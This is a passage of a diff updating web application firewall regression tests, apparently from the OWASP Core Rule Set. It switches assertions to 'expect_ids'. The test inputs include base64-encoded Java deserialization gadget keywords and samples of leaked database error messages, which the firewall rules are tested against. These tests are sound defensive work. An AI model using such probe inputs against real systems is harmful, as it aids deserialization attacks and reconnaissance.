@@ tests: version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 288 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5553,7 +5840,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 289 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5573,7 +5861,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 290 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5593,7 +5882,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 291 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5613,7 +5903,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 292 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5632,7 +5923,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 293 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5651,7 +5943,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 294 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5670,7 +5963,8 @@ tests: version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 295 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5689,7 +5983,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 296 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5708,7 +6003,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 297 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: @@ -5727,7 +6023,8 @@ tests: version: "HTTP/1.0" data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 298 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5746,7 +6043,8 @@ tests: version: "HTTP/1.0" data: "test=d2hpbGVjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 299 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5765,7 +6063,8 @@ tests: version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 300 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5785,7 +6084,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 301 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5805,7 +6105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 302 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5825,7 +6126,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 303 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5844,7 +6146,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 304 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5863,7 +6166,8 @@ tests: version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 305 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5882,7 +6186,8 @@ tests: version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 306 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5901,7 +6206,8 @@ tests: version: "HTTP/1.0" data: "test=d2hpbGVjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 307 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5920,7 +6226,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 308 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: @@ -5939,7 +6246,8 @@ tests: version: "HTTP/1.0" data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 309 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -5958,7 +6266,8 @@ tests: version: "HTTP/1.0" data: "test=HdoaWxlY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 310 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -5977,7 +6286,8 @@ tests: version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 311 desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -5997,7 +6307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 312 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6017,7 +6328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 313 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6037,7 +6349,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 314 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6056,7 +6369,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 315 desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6075,7 +6389,8 @@ tests: version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 316 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6094,7 +6409,8 @@ tests: version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 317 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6113,7 +6429,8 @@ tests: version: "HTTP/1.0" data: "test=HdoaWxlY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 318 desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6132,7 +6449,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 319 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: @@ -6151,7 +6469,8 @@ tests: version: "HTTP/1.0" data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 320 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6170,7 +6489,8 @@ tests: version: "HTTP/1.0" data: "test=B3aGlsZWNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 321 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6189,7 +6509,8 @@ tests: version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 322 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6209,7 +6530,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 323 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6229,7 +6551,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 324 desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6249,7 +6572,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 325 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6268,7 +6592,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 326 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6287,7 +6612,8 @@ tests: version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 327 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6306,7 +6632,8 @@ tests: version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 328 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6325,7 +6652,8 @@ tests: version: "HTTP/1.0" data: "test=B3aGlsZWNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 329 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6344,7 +6672,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 330 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: @@ -6363,4 +6692,5 @@ tests: version: "HTTP/1.0" data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml index 96009a36e..bb4b5cf06 100644 --- a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml +++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml @@ -22,7 +22,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "949110" + log: + expect_ids: [949110] - test_id: 2 desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered stages: @@ -38,7 +39,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: id "949110" + log: + no_expect_ids: [949110] - test_id: 3 desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered stages: @@ -53,7 +55,8 @@ tests: uri: "/options" version: "HTTP/1.1" output: - no_log_contains: "id \"949110\"" + log: + no_expect_ids: [949110] - test_id: 4 desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered stages: @@ -68,7 +71,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"949110\"" + log: + expect_ids: [949110] - test_id: 5 desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly stages: diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index 8880834b0..4e4c8ffd5 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} output: - log_contains: "id \"951110\"" + log: + expect_ids: [951110] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index 0f6f70f3f..df1498b4e 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} output: - log_contains: "id \"951120\"" + log: + expect_ids: [951120] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index 04d9d75a2..2dee3e9fb 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} output: - log_contains: "id \"951130\"" + log: + expect_ids: [951130] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index 2ade0e0ad..1e9af862e 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} output: - log_contains: "id \"951140\"" + log: + expect_ids: [951140] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml index de3cb5a23..161aaea10 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} output: - log_contains: "id \"951150\"" + log: + expect_ids: [951150] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index cfbeb2a88..ea77b7f80 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} output: - log_contains: "id \"951160\"" + log: + expect_ids: [951160] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index cc0faad55..a6ab7eada 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} output: - log_contains: "id \"951170\"" + log: + expect_ids: [951170] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index a9b5c0d5d..ebbb20c6c 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} output: - log_contains: "id \"951180\"" + log: + expect_ids: [951180] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index 21e7d6d8a..24570ba38 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} output: - log_contains: "id \"951190\"" + log: + expect_ids: [951190] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index ae89d41d8..2a31214ec 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} output: - log_contains: "id \"951200\"" + log: + expect_ids: [951200] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index 740acf8f9..554fc98ef 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} output: - log_contains: "id \"951210\"" + log: + expect_ids: [951210] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index b92a07a32..37d8c78e1 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml @@ -23,7 +23,8 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} output: - log_contains: "id \"951220\"" + log: + expect_ids: [951220] - test_id: 2 desc: "Matching mssql SQL Information Leakage" stages: @@ -43,4 +44,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} output: - log_contains: "id \"951220\"" + log: + expect_ids: [951220] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 085ff639d..7663c5e82 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml @@ -23,7 +23,8 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} output: - log_contains: "id \"951230\"" + log: + expect_ids: [951230] - test_id: 2 desc: "Matching MySQL SQL Information Leakage" stages: @@ -43,4 +44,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} output: - log_contains: "id \"951230\"" + log: + expect_ids: [951230] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index be9ca63e3..720f5cae0 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml @@ -23,7 +23,8 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} output: - log_contains: "id \"951240\"" + log: + expect_ids: [951240] - test_id: 2 desc: "Matching PostgreSQL Information Leakage" stages: @@ -43,4 +44,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} output: - log_contains: "id \"951240\"" + log: + expect_ids: [951240] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index 473ffacda..321868202 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} output: - log_contains: "id \"951250\"" + log: + expect_ids: [951250] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index c26b567bc..e1e08b2dc 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml @@ -23,4 +23,5 @@ tests: data: |- {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} output: - log_contains: "id \"951260\"" + log: + expect_ids: [951260] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index d3f6492a4..3fdccb669 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml @@ -22,7 +22,8 @@ tests: uri: "/post" data: "Maximum allowed file size is 10 MB" output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] - test_id: 2 desc: "'Invalid date' Wordpress FP, it should not match at PL1" stages: @@ -41,7 +42,8 @@ tests: uri: "/post" data: "Invalid date selected" output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] - test_id: 3 desc: "'The function' might lead to FPs, it should not match at PL1" stages: @@ -60,7 +62,8 @@ tests: uri: "/post" data: "please review the function" output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] - test_id: 4 desc: "'Static function' might lead to FPs, it should not match at PL1" stages: @@ -79,7 +82,8 @@ tests: uri: "/post" data: "This is a static function" output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] - test_id: 5 desc: "'cannot be empty is too common for PL1 GH isue #3399" stages: @@ -98,4 +102,5 @@ tests: uri: "/post" data: "Field cannot be empty." output: - no_log_contains: id "953100" + log: + no_expect_ids: [953100] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index c39660999..698ea42ee 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml @@ -23,7 +23,8 @@ tests: data: |- {"body": "Maximum allowed file size is 10 MB"} output: - log_contains: id "953101" + log: + expect_ids: [953101] - test_id: 2 desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" stages: @@ -43,7 +44,8 @@ tests: data: |- {"body": "Invalid date selected"} output: - log_contains: id "953101" + log: + expect_ids: [953101] - test_id: 3 desc: "'The function' might lead to FPs at PL1, it should match at PL2" stages: @@ -63,7 +65,8 @@ tests: data: |- {"body": "Please review the function"} output: - log_contains: id "953101" + log: + expect_ids: [953101] - test_id: 4 desc: "'Static function' might lead to FPs at PL1, it should match at PL2" stages: @@ -83,7 +86,8 @@ tests: data: |- {"body": "This is a static function"} output: - log_contains: id "953101" + log: + expect_ids: [953101] - test_id: 5 desc: "'cannot be empty is too common for PL1, it should match at PL2 GH isue #3399" stages: @@ -103,4 +107,5 @@ tests: data: |- {"body": "cannot be empty."} output: - log_contains: id "953101" + log: + expect_ids: [953101] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 5070e5e5d..4475c5935 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -22,7 +22,8 @@ tests: uri: "/reflect" data: "{\"body\": \"\"}" output: - log_contains: "id \"953120\"" + log: + expect_ids: [953120] - test_id: 2 desc: "Negative test, returns \"}" output: - log_contains: "id \"953120\"" + log: + expect_ids: [953120] - test_id: 6 desc: "Negative test, returns \"}" output: - log_contains: "id \"953120\"" + log: + expect_ids: [953120] diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 905f7d154..93c7d327a 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -20,4 +20,5 @@ tests: uri: "/reflect" data: "{\"body\": \"C:\\\\inetpub \\n\"}" output: - log_contains: "id \"954100\"" + log: + expect_ids: [954100] diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index a9eed253a..71366862c 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml @@ -21,7 +21,8 @@ tests: data: |- {"body": "text=404.14 - URL too long."} output: - log_contains: id "954120" + log: + expect_ids: [954120] - test_id: 2 desc: 'Match IIS error page' stages: @@ -39,4 +40,5 @@ tests: data: |- {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} output: - log_contains: id "954120" + log: + expect_ids: [954120] diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index f052a9dfb..7e9c13b50 100644 --- 